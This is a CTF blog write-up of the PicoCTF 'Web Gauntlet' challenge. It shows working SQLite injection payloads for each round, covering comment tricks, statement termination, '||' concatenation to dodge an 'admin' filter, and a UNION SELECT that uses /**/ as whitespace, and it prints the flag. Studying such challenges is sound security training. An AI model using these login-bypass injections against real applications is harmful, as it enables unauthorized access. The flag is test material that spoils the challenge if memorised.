PicoCTF Writeup – Web Gauntlet

by Posted on

Information:

CTF Name: PicoCTF

CTF Challenge: Web Gauntlet

Challenge Category: Web Exploitation

Challenge Points: 200

PicoCTF 2020 Mini-Competition.

# Challenge Description:

Can you beat the filters? Log in as admin http://jupiter.challenges.picoctf.org:40791/ http://jupiter.challenges.picoctf.org:40791/filter.php

Hints: You are not allowed to login with valid credentials. Write down the injections you use in case you lose your progress. For some filters it may be hard to see the characters, always (always) look at the raw hex in the response. sqlite. If your cookie keeps getting reset, try using a private browser window

Writeup

 
In this challenge we have two URLs. The first one points us the a login page, as you can see below:
 
 

And the second links has a list of the filters present in this login page for each round, see below:

 
Round1: or
 

Well, it seems that we have to pass 5 challenges to get the flag.

Round 1

In the first one, we know that we cannot use the word or bypass this. We also know from the description that we want to login as admin. So what we can try to do is insert admin as the username and a random value for the password, the result:    

As you can see we are given the full query on the top left corner, which is:

SELECT * FROM users WHERE username='admin' AND password='pass'

I inserted admin as username and pass as password. It did not work, but we managed to get the query which helps a lot!   If you know SQL, you know that this command returns the user with the username and password equal to the ones provided. We do not know the password, but we can try to, for example, comment everything after the username, ignoring the AND. As such:

SELECT * FROM users WHERE username='admin' -- AND password='pass'

Whatever that is after “–” is commented so it will be ignored and what the query now does is it selects all users with the username admin. Below you have the input values, for the password, you can insert anything, it is commented so it will not matter:

Round 2

Round2: or and like = —  

In this one, we cannot use the — comment. However, we know that this is SQLite and there are 2 types of comments, the — and the /**/. It is quite clear that we can simply use the other one as we did before, as such:    

SELECT * FROM users WHERE username='admin' /* AND password='pass'

Like this, we once again bypass the password and simply query the username = admin. Below you have the input image:  

Round 3

Round3: or and = like > < —  

It seems that we can still use the /**/, however, once I tried I did not succeed in login in. It must be something else. After searching around for a while, I remembered that the “;” represents the end of a query statement. I decided to just give it a go!  

SELECT * FROM users WHERE username='admin'; AND password='pass'

The SQL statement ends at “;” everything after is another statement, or is considered an error.  

Round 4

Round4: or and = like > < — admin  

This one is harder! It seems that we cannot use the admin word! In that case, how can we enter as admin at all? There are a few ideas I had, for instance, we could try to write:  

adadminmin   

I thought that this way the admin word in red would be removed and we would end up with admin, however, this did not work. After searching and trying several things for a while I was able to find out that these”||” represent concatenation in SQLite. So, I decided to try this, as such:    

SELECT * FROM users WHERE username='ad'||'min'; AND password='pass'

What this does is, simply concatenates the ad with the min, making it admin, and finishes the statement at the ;. See the image below:

There is another way, using the union statement and considering this article in PortSwigger.

In the article, it presented the problem of white spaces, and, combining that with the UNION command we can also bypass the input, as such:

SELECT * FROM users WHERE username='mregra'/**/UNION/**/SELECT/**/*/**/FROM/**/users/**/LIMIT/**/1; AND   password='pass'

This SQL statement what it does is it makes two querys, the 1st one is:

SELECT * FROM users WHERE username='mregra'

And the second one is:    

SELECT/**/*/**/FROM/**/users/**/LIMIT/**/1;

The UNION simply combines the two SELECT statement, the /**/ between all words represent the white spaces as described in the PortSwigger article. And we have to include the LIMIT 1 part because usually, in a database, the admin is the first entry of the table and with this command, we simply retrieve the first line, which in this case is the admin, see image below:  

Round 5

Round5: or and = like > < — union admin  

For this round, we cannot use the second method of the previous round, but it seems that we can still use the first method, I decided to give it a go and it worked! See the image below:  

Once I signed in a message appeared: “Congrats! You won! Check out filter.php”   The contents of filter.php are in the image below:  

And the flag is:  

Show flag
picoCTF{y0u_m4d3_1t_96486d415c04a1abbbcf3a2ebe1f4d02}

Thank you very much for reading!

Cheers,

MRegra

Share this post:

Popular posts

Author Profile
MRegra Silva
Related Posts

Published by MRegra Silva

2 Replies to “PicoCTF Writeup – Web Gauntlet”

  1. This is the right website for everyone who hopes to find out about
    this topic. You realize so much its almost tough to argue with you (not that I
    really will need to…HaHa). You definitely put a brand new spin on a
    subject that has been written about for ages.
    Excellent stuff, just great!

    Reply

Leave a Reply

Your email address will not be published. Required fields are marked *